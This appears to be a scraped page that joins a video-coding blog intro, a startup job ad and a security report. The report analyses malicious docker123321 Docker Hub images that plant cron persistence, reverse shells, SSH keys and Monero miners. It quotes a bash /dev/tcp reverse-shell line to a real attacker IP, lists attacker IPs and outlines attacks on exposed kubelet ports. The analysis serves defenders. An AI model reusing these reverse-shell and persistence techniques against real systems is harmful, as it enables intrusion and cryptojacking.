Is image and video coding dead? From the standpoint of application and relevance, video compression is very much alive and kicking and thriving on the internet. The Cisco white paper “The Zettabyte Era: Trends and Analysis (June 2017)” reported that in 2016, IP video traffic accounted for 73% of total IP traffic. This is estimated to go up to 82% by 2021. Sandvine reported in the “Global Internet Phenomena Report, June 2016” that 60% of peak download traffic on fixed access networks in North America was accounted for by four VOD services: Netflix, YouTube, Amazon Video and Hulu. Ericsson’s “Mobility Report November 2017” estimated that for mobile data traffic in 2017, video applications occupied 55% of the traffic. This is expected to increase to 75% by 2023.

As for industry involvement in video coding research, it appears that the area is more active than ever before. The Alliance for Open Media (AOM) was founded in 2015 by leading tech companies to collaborate on an open and royalty-free video codec. The goal of AOM was to develop video coding technology that was efficient, cost-effective, high quality and interoperable, leading to the launch of AV1 this year. In the ITU-T VCEG and ISO/IEC MPEG standardization world, the Joint Video Experts Team (JVET) was formed in October 2017 to develop a new video standard that has capabilities beyond HEVC. The recently-concluded Call for Proposals attracted an impressive number of 32 institutions from industry and academia, with a combined 22 submissions. The new standard, which will be called Versatile Video Coding (VVC), is expected to be finalized by October 2020.

Like many global internet companies, Netflix realizes that advancements in video coding technology are crucial for delivering more engaging video experiences. On one end of the spectrum, many people are constrained by unreliable networks or limited data plans, restricting the video quality that can be delivered with current technology. On the other end, premium video experiences like 4K UHD, 360-degree video and VR are extremely data-heavy. Video compression gains are necessary to fuel the adoption of these immersive video technologies.

So how will we get to deliver HD quality Stranger Things at 100 kbps for the mobile user in rural Philippines? How will we stream a perfectly crisp 4K-HDR-WCG episode of Chef’s Table without requiring a 25 Mbps broadband connection? Radically new ideas. Collaboration. And forums like the Picture Coding Symposium 2018 where the video coding community can share, learn and introspect.

Influenced by our product roles at Netflix, exposure to the standardization community and industry partnerships, and research collaboration with academic institutions, we share some of our questions and thoughts on the current state of video coding research. These ideas have inspired us as we embarked on organizing the special sessions, keynote speeches and invited talks for PCS 2018.

Smarking (YC W15) Is Hiring Sr. Front End Eng in SF


Smarking is looking for excellent senior frontend engineers to help us scale the initial success of the company to the next level. Ideal candidates will be experienced and passionate about working in an early-stage tech company with initial product-market-fit and growing it into the next stage with rocket speed. As a senior member of our frontend team, you will be responsible for: 1) evolving frontend codebase to efficiently render beautiful, complex, and highly interactive charts; 2) architecting highly customizable and user-dependent features; 3) continuous optimization of performance; 4) improving automation and deployment pipelines. Senior frontend engineers will lead major engineering projects with the highest impact on our business and operations.

Smarking is a fast growing tech company with hyper-driven MIT PhDs, engineers, data scientists, transportation experts, and seasoned business professionals who are working hard to solve the notorious parking problem via a unique angle. By providing the very first enterprise data analytics software (SaaS) to the parking industry, Smarking is establishing itself as the leader in an emerging market of $10 Billion in the US and $40 Billion globally.

Smarking aims to enable highly efficient urban mobility by digitizing parking spaces and distributing parking inventory dynamically, in order to get the world ready for the connected, shared, and autonomous driving future. Backed by a group of top investors such as Y Combinator and Khosla Ventures, Smarking has brought real-time dashboards and predictive analytics to thousands of parking locations for cities (e.g. Miami, Santa Monica), airports(e.g. Boston, San Diego), universities (e.g. MIT), hospitals, parking operators, and garage owners. For the first time, cities and parking operators can make informed decisions for planning, operations, and pricing in real-time with the help of our products.

Our front-end is mostly written in ES6. Our tech stack includes React, Redux, and Flow. We use mocha, chai, enzyme, and selenium for testing. We use webpack for packaging, and docker for containerization. And we're constantly trying new tools and practices to be the best we can.

SOUNDS LIKE A FIT?

We would love to work with driven engineers to learn from each other and grow together. If Smarking sounds like a good fit for you, please apply. We look forward to hearing from you!

How the modern containerization trend is exploited by attackers


Kromtech Security Center found 17 malicious Docker images stored on Docker Hub for an entire year. Even after several complaints on GitHub and Twitter, and research by sysdig.com and fortinet.com, cybercriminals continued to enlarge their malware arsenal on Docker Hub. With more than 5 million pulls, the docker123321 registry is considered a springboard for cryptomining containers. Today’s growing number of publicly accessible, misconfigured orchestration platforms like Kubernetes allows hackers to create fully automated tools that force these platforms to mine Monero. By pushing malicious images to a Docker Hub registry and having them pulled onto victims’ systems, hackers were able to mine 544.74 Monero, equal to roughly $90,000.

Here is the timeline:


Figure 1. Timeline of malicious docker123321 registry lifecycle.

Kubernetes clusters that were deployed for educational purposes or for tests, with little regard for security requirements, represent a real threat to their owners. Even an experienced engineer may stop caring about, or simply forget, that part of the infrastructure once the tests are over.

Background

Palo Alto Networks post:

Attackers have traditionally profited by stealing identities or credit card numbers and then selling them on underground markets. According to Verizon Data Breach Investigations Reports, the price for stolen records has fallen, so cyber attackers are on the hunt for new ways to boost their profits. Thanks to advances in attack distribution, anonymous payments, and the ability to reliably encrypt and decrypt data, ransomware is on a tear.

With the increase in prices for the trendsetting cryptocurrency and several altcoins, the number of cryptocurrency-mining malware incidents grew correspondingly. Cybercriminals have been running cryptocurrency attacks on hijacked machines for some time, finding it more profitable than ransomware. Now, however, malware authors have found a new way to take their nefarious actions into the cloud and bypass the need to hijack individual computers. Hackers hunt for poorly configured cloud-native environments in order to mine cryptocurrency using large amounts of computational power.

Why did we do this?

We noticed an increase in hacker interest in publicly accessible orchestration platforms such as Kubernetes — a container orchestration tool that automates the deployment, update, and monitoring of containers.

At the start of 2018, research by Sysdig showed that attackers moved on from EC2 exploits to container-specific and kubernetes-specific exploits.  A preconfigured Kubernetes instance located on honeypot servers was poisoned with malicious Docker containers that would mine Monero.

Cryptojacking has become a real-life issue, targeting a diverse array of victims, from individual consumers to large manufacturers. In February 2018, Checkpoint researchers found one of the biggest malicious mining operations ever discovered. Cybercriminals exploited the known CVE-2017-1000353 vulnerability in the Jenkins Java deserialization implementation. Since Jenkins has been called the most widely deployed automation server, with an estimated 1 million users, the attack had far more serious consequences. During the malicious mining operation, the hackers accumulated 10,800 Monero, which is currently worth $3,436,776.

Around the same time, in February 2018, RedLock researchers discovered hundreds of Kubernetes administration consoles accessible over the internet without any password protection, including servers belonging to Tesla. The hackers had infiltrated Tesla’s Kubernetes console, which was not password protected. Within one Kubernetes pod, access credentials were exposed to Tesla’s AWS environment, which contained an Amazon S3 (Amazon Simple Storage Service) bucket that had sensitive data such as telemetry. In addition to the data exposure, hackers were performing crypto mining from within one of Tesla’s Kubernetes pods.

The Tesla incident is just the first of many container technology-based exploits we will see in the coming months and years.

What are containers, Docker and Kubernetes?

Containers are a way of packaging software. You can think of running a container like running a virtual machine, without the overhead of spinning up an entire operating system.

Docker helps you create and deploy software within containers. With Docker, you create a special file called a Dockerfile. Dockerfiles define a build process, which, when fed to the ‘docker build’ command, will produce an immutable docker image. You can think of this as a snapshot of your application, ready to be brought to life at any time. When you want to start it up, just use the ‘docker run’ command to run it anywhere the docker daemon is supported and running. It can be on your laptop, your production server in the cloud, or on a raspberry pi. Docker also provides a cloud-based repository called Docker Hub. You can think of it like GitHub for Docker Images. You can use Docker Hub to store and distribute the container images you build.

When you need to start the right containers at the right time, figure out how they can talk to each other, handle storage considerations, and deal with failed containers or hardware, that’s where Kubernetes comes in. Kubernetes is an open source container orchestration platform, allowing large numbers of containers to work together in harmony, reducing operational burden. It helps with things like:

  • Running containers across many different machines

  • Scaling up or down by adding or removing containers when demand changes

  • Keeping storage consistent with multiple instances of an application

  • Distributing load between the containers

  • Launching new containers on different machines if something fails

Kubernetes is supported by all major container management and cloud platforms such as Red Hat OpenShift, Docker EE, Rancher, IBM Cloud, AWS EKS, Azure, SUSE CaaS, and Google Cloud.

How cybercriminals behave

The original attack schemes against the Docker engine and Kubernetes instances were explained by Aqua Security and Alexander Urcioli, respectively.

In the first case, researchers from Aqua Security simulated a system with an “accidentally” exposed docker daemon. Here is what they discovered two days later:

  • Hundreds of suspicious actions were logged, many of them created automatically.

  • The attacker attempted to execute a variety of docker commands for image and container management.

  • After successful information gathering about the running Docker version, the attacker used the docker import functionality for image injection.

  • After a successful image injection, the attacker would start mining.

The second case shows how Alexander Urcioli came across an already compromised personal Kubernetes cluster. He realized that, due to a misconfiguration that publicly exposed the kubelet ports (TCP 10250, TCP 10255) and allowed unauthenticated API requests, the attacker:

  • Sent two requests: an initial POST and a follow-up GET with exec command to kubelet.

  • Executed a dropper script on a running Docker container through kubelet. Dropper script named “kube.lock” would download the mining software from transfer.sh and execute it.

Recently we found another disturbing issue with a misconfigured Kubernetes cluster. It turns out that the kubelet exposes an unauthenticated endpoint on port 10250.

Let’s come back to Alexander Urcioli’s research one more time:

There are two ports that kubelet listens in on, 10255 and 10250. The former is a read-only HTTP port and the latter is an HTTPS port that can essentially do whatever you want.

Further inspection showed that the Kubernetes PodList leaked AWS access keys (access key ID and secret access key), which simply provide root access to AWS environments, including Amazon EC2, RDS, S3, and related actions on them.

When we look through the latest kubelet documentation, we find debug handlers in charge of running code in any container. The option is enabled by default.

--enable-debugging-handlers     Default: true
Enables server endpoints for log collection and local running of containers and commands

This option being left on by default, in conjunction with an exposed port 10250, can lead to devastating consequences.

We can now outline the steps an average cybercriminal can take to attack container-based virtualized environments:

  • Collect targets automatically through Shodan, Censys or Zoomeye.

  • Infiltrate vulnerable or misconfigured Docker registries or Kubernetes instances.

  • Exploit weak default settings and inject mining malware within containers. Usually, this is done by injecting a malicious docker image into the docker host. The popular and conventional way to do this is to push the image to a registry (Docker Hub is the natural place) and pull it from the victim host.

All of this also requires command-and-control (C2) servers; here is how cybercriminals build them:

  • Collect targets automatically through Shodan, Censys or Zoomeye.

  • Automate the exploitation of remote targets using something like AutoSploit.

  • Take full control of compromised targets and place C2 servers there.

Does Docker care?

Why is it feasible to pack mining malware into Docker containers? We decided to poke around Docker images with an eye toward security.

In an interview, Ericsson’s Head of Cloud Jason Hoffman stated: “Docker’s taking off because it’s the new package management”. That provides a good explanation of Docker’s rapid adoption, but also hides the fact that Docker images are generally dependent on the package manager provided by an underlying Linux distribution. Images like CentOS 5.11 are deliberately held back for the sake of compatibility and have the Shellshock vulnerability.

From https://medium.com/microscaling-systems/dockerfile-security-tuneup-166f1cdafea1

One of the key differences between containers and virtual machines is that containers share the kernel with the host. By default, Docker containers run as root, which creates a breakout risk: if your container is compromised as root, it has root access to the host.

Docker is making Security Scanning available as a free preview for a limited time. From the Docker docs:

Docker Security Scanning

The Docker Security Scanning preview service will end on March 31st, 2018, for private repos (not official repos) in both Docker Cloud and Docker Hub. Until then, scanning in private repos is limited to one scan per day on the “latest” tag.

According to blog.docker.com:

Docker Security Scanning went alongside Docker Cloud to trigger a series of events once a new image is pushed to a repository. The service included a scan trigger, the scanner, a database, plugin framework and validation services that connect to CVE databases.

Security Scanning provides a detailed security profile of your Docker images for proactive risk management and to streamline software compliance. Docker Security Scanning conducts binary level scanning of your images before they are deployed, provides a detailed bill of materials (BOM) that lists out all the layers and components, continuously monitors for new vulnerabilities, and provides notifications when new vulnerabilities are found.

From the Docker docs:

Cluster and application management services in Docker Cloud are shutting down on May 21. You must migrate your applications from Docker Cloud to another platform and deregister your Swarms. 

The Docker Cloud runtime is being discontinued. This means that you will no longer be able to manage your nodes, swarm clusters, and the applications that run on them in Docker Cloud. To protect your applications, you must migrate them to another platform, and if applicable, deregister your Swarms from Docker Cloud.

It seems that the Docker ecosystem is becoming more enterprise oriented and the responsibility for safe migration and further secure maintenance falls on ordinary developers.

What went wrong?

Several disturbing incidents that we found on Twitter:


Figure 2. Trojan MiraiDDoS.An embedded in lightweight Unix-like operating system BusyBox stored in DockerHub image has been detected by VirusTotal.

Fortunately, that Docker registry is no longer available.

Several tweets report embedded cryptocoin miners:


Figure 3. Twitter user found embedded BTC miner in the docker container. https://twitter.com/jperras/status/894561761252319232 The image is already banned.


Figure 4. Twitter user complaining that there are no convenient ways to report about malware in images on DockerHub.


Figure 5. As there is no convenient way to report malicious images on Docker Hub, users complain on GitHub.

What we found

While we were looking through GitHub we came across a complaint that drew our attention:


Figure 6. Docker Hub registry docker123321 was accused of storing malicious image


Figure 7. Public repository https://hub.docker.com/r/docker123321/ was created approximately in May 2017 and was suspected of storing 17 malicious images.

Name of image (creation timestamp):

1st bunch of malicious images:

  • docker123321/tomcat (2017-07-25 04:53:28)
  • docker123321/tomcat11 (2017-08-22 08:38:48)
  • docker123321/tomcat22 (2017-08-22 08:58:35)

2nd bunch of malicious images:

  • docker123321/kk (2017-10-13 18:56:22)
  • docker123321/mysql (2017-10-24 01:49:42)
  • docker123321/data (2017-11-09 01:00:14)
  • docker123321/mysql0 (2017-12-12 18:32:22)

3rd bunch of malicious images:

  • docker123321/cron (2018-01-05 11:33:04)
  • docker123321/cronm (2018-01-05 11:33:04)
  • docker123321/cronnn (2018-01-12 02:06:11)
  • docker123321/t1 (2018-01-18 09:54:04)
  • docker123321/t2 (2018-01-19 09:41:46)

4th bunch of malicious images:

  • docker123321/mysql2 (2018-02-02 11:40:53)
  • docker123321/mysql3 (2018-02-02 18:52:00)
  • docker123321/mysql4 (2018-02-05 14:05:18)
  • docker123321/mysql5 (2018-02-05 14:05:18)
  • docker123321/mysql6 (2018-02-07 02:16:29)

The first three malicious Docker images were created in July and August 2017:

  • docker123321/tomcat

  • docker123321/tomcat11

  • docker123321/tomcat22

We inspected the docker image with ‘$ docker inspect docker123321/tomcat’ using CLI:


 Figure 8. The output of CLI command

It turns out that the image runs a shell script containing a sequence of commands:

  • Mounts /etc/ from the host filesystem to /mnt/etc/ inside the container so that it can write to files below /etc on the host.

  • Adds a new cronjob to /etc/crontab on the host, which allows the attacker to gain persistence on the victim’s system.

  • The cronjob runs every minute and executes a Python Reverse Shell, which gives the attacker an interactive shell on the victim’s machine. Everything the attacker types on the server side is sent over the socket, and the victim’s system executes it as a command in a subprocess.

Imagine a situation where an inexperienced user pulls an image like docker123321/tomcat. Even if the user realizes that the image is not what it claims to be and tries to delete it from the system, the user could very easily already have been compromised.

The docker123321/tomcat11 image is similar to the previous one, as its embedded shell script follows the same pattern:


Figure 9. The output of ‘$ docker inspect docker123321/tomcat11’ CLI command

The difference from the previous example is that this shell script runs a Bash Reverse Shell, which does the following:

  • Makes the victim machine connect to a control server and then forwards the session to it.

  • The command bash -i >& invokes bash with an “interactive” option.

  • Then /dev/tcp/98.142.140.13/3333 redirects that session to a TCP socket via a device file; Linux has a built-in /dev/tcp device file.

  • This built-in device file lets bash connect directly to any IP and any port out there.

  • Finally, 0>&1 takes standard output and connects it to standard input.

We realized that when the container runs on a victim’s machine, it gives the attacker remote command execution on that machine.


Figure 10. The output of ‘$ docker inspect docker123321/tomcat22’ CLI command

Here we found a shell script that does the following:

  • mounts /root/.ssh/ from the host filesystem to /mnt/root/.ssh/ inside the container so that it writes to files below /root/.ssh/ on the host.

  • Adds SSH key to /root/.ssh/authorized_keys file on the host machine. Its purpose is to provision access without requiring a password for each login.

Once complete, it grants the attacker full control of the victim’s machine. Making a profit is then as easy as injecting ransomware or running a miner on the compromised system.

October 2017: 2 new malicious images were added:

  • docker123321/kk

  • docker123321/mysql


Figure 11. The output of ‘$ docker inspect docker123321/kk’ CLI command

Inspection showed the following behavior:

  • First, it adds a new crontab entry under the host’s /etc directory.

  • The cronjob runs every minute and uses the system tool curl to download test44.sh.


Figure 12. test44.sh

The perpetrator’s Monero wallet address appears in the bash script:

 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo  


Figure 13. The perpetrator’s Monero wallet

The total paid out is 544.74 XMR, which is equal to 89,097.67 USD. There are high odds that this $90k was earned by poisoning cloud environments with crypto-mining containers.

A similar algorithm was implemented in docker123321/mysql:


Figure 14. The output of ‘$ docker inspect docker123321/mysql’ CLI command

When the container runs, the following will happen:

  • First, it adds a new crontab entry under the host’s /etc directory.

  • The cronjob runs every minute and uses the system tool curl to download logo3.jpg, which is actually a bash script.

  • The script contains a sequence of commands that starts mining software on the victim’s machine.

test44.sh and the same malicious logo1.jpg from docker123321/cron were investigated in detail earlier.

Research shows that docker123321 images can be divided into five categories.

Docker image name and type of malware:

  • docker123321/tomcat, docker123321/mysql2, docker123321/mysql3, docker123321/mysql4, docker123321/mysql5, docker123321/mysql6 - containers run a Python Reverse Shell
  • docker123321/tomcat11 - containers run a Bash Reverse Shell
  • docker123321/tomcat22 - containers add the attacker’s SSH key
  • docker123321/cron, docker123321/cronm, docker123321/cronnn, docker123321/mysql, docker123321/mysql0, docker123321/data, docker123321/t1, docker123321/t2 - containers run embedded cryptocoin miners (on condition that the container runs, it will download a malicious .jpg file that runs in bash and exposes mining software)
  • docker123321/kk - containers run embedded cryptocoin miners (on condition that the container runs, it will download a malicious .sh file that runs in bash and exposes mining software)

Table 1. Python Reverse Shell and embedded cryptocoin miners hold most of the images.

Docker image name and IP address used in the image:

  • docker123321/cron, docker123321/cronm - 162.212.157.244
  • docker123321/mysql - 104.225.147.196
  • docker123321/mysql0 - 128.199.86.57
  • docker123321/mysql2, docker123321/mysql3, docker123321/mysql4, docker123321/mysql5, docker123321/mysql6 - 45.77.24.16
  • docker123321/data - 142.4.124.50
  • docker123321/kk - 198.181.41.97
  • docker123321/tomcat, docker123321/tomcat11 - 98.142.140.13
  • docker123321/cronnn - 67.231.243.10
  • docker123321/t1, docker123321/t2 - 185.82.218.206

Table 2. Attacker used 9 IPs to address his remote servers.

A simple lookup (for instance, of 67.231.243.10) shows that the IP was used to serve malware, including:

  • xmrig.exe - open-source cryptocurrency mining utility

  • .jpg files which are obfuscated malicious bash scripts

  • PowerShell scripts


Figure 15. Virustotal IP address information

When we look at the historical view of the most-used IPs using the Shodan CLI, we see the following:

Figures 16-18. Shodan host information.

The Shodan data shows numerous vulnerabilities in network services associated with OpenSSH, Pure-FTPd, ProFTPD, and Apache HTTP Server. There are high odds that the attacker exploited these vulnerabilities in order to turn remote machines into command-and-control servers.

Conclusions

For ordinary users, just pulling a Docker image from the DockerHub is like pulling arbitrary binary data from somewhere, executing it, and hoping for the best without really knowing what’s in it.

The main thing we should consider is traceability. The process of pulling a Docker image has to be transparent and easy to follow. First, you can simply look through the Dockerfile to find out what the FROM and ENTRYPOINT instructions are and what the container does. Second, prefer Docker images built with Docker automated builds, because with automated builds you get traceability between the source of the Dockerfile, the version of the image, and the actual build output.

Each build’s details show a lot of information that can be used for improved trust in the image:

  • The SHA from the git repository containing the Dockerfile

  • Every command from the Dockerfile that is executed is shown

  • Finally, it all ends with a digest of the image pushed

Kubernetes deployments are just as vulnerable to attacks and exploits from hackers and insiders as traditional environments. By attacking the orchestration tools, hackers can disrupt running applications and even gain control of the underlying resources used to run containers. Old models and tools for security will not be able to keep up in a constantly changing container environment.  You need to ask yourself whether you’re able to monitor what’s going on inside a pod or container to determine if there is a potential exploit. Pay specific attention to the most damaging “kill chain” attacks — a series of malicious activities which together achieve the attacker’s goal. Detecting events in a kill chain requires multiple layers of security monitoring. The most critical vectors to monitor in order to have the best chances of detection in a production environment are Network inspection, Container monitoring, and Host security.

Internal and external communication within a Kubernetes cluster should be considered the most important part of a secure configuration. The key lessons we learned:

  • the kubelet connection is not secure enough to be run across the internet.

  • SSH tunnels must be used to securely put packets onto the cluster's network without exposing the kubelet's web server to the internet.

  • The kubelet needs to serve its https endpoint with a certificate that is signed by the cluster CA.

Adherence to these principles can help you gain a certain level of security awareness.

 
